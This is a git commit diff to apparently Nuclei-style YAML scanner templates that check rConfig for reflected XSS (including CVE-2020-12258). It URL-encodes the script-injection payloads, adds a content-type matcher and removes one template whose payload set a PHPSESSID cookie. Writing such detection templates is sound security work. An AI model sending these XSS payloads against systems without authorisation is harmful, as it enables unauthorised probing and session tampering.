Added "text/html" matcher

patch-1
Prince Chaddha 2021-03-09 14:15:09 +05:30
parent c633c33bde
commit f8720698b6
3 changed files with 12 additions and 30 deletions

View File

@ -10,7 +10,7 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/devicemgmt.php?deviceId="><script>alert(document.cookie)</script>'
- '{{BaseURL}}/devicemgmt.php?deviceId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
@ -19,8 +19,12 @@ requests:
words:
- "<script>alert(document.cookie)</script>"
part: body
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

View File

@ -1,26 +0,0 @@
id: CVE-2020-12258
info:
name: rConfig 3.9.4 XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12258
tags: cve,cve2020,rconfig,xss
requests:
- method: GET
path:
- '{{BaseURL}}/configDevice.php?rid="><script>document.cookie="PHPSESSID=123456789"</script>'
matchers-condition: and
matchers:
- type: word
words:
- '<script>document.cookie="PHPSESSID=123456789"</script>'
part: body
condition: and
- type: status
status:
- 200

View File

@ -10,7 +10,7 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/configDevice.php?rid="><script>alert(document.cookie)</script>'
- '{{BaseURL}}/configDevice.php?rid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
@ -19,8 +19,12 @@ requests:
words:
- "<script>alert(document.cookie)</script>"
part: body
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"